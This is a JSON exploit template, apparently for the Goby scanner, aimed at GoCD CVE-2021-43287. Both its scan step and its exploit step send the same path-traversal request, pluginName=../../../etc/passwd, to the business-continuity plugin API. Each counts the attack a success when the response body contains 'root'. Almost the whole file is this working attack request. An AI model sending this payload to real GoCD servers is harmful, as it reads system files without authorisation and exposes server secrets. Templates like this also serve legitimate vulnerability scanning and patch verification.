{ "Name": "GoCD Arbitrary file reading CVE-2021-43287", "Level": "3", "Tags": [ "fileread" ], "GobyQuery": "title=\"Login - Go\"", "Description": "", "Product": "", "Homepage": "https://gobies.org/", "Author": "gobysec@gmail.com", "Impact": "", "Recommendation": "", "References": [ "https://gobies.org/" ], "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd", "follow_redirect": true, "header": null, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "root", "bz": "" } ] }, "SetVariable": [ "output|lastbody|regex|" ] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd", "follow_redirect": true, "header": null, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "root", "bz": "" } ] }, "SetVariable": [ "output|lastbody|regex|" ] } ], "PostTime": "2022-07-15 22:05:52", "GobyVersion": "1.9.323" }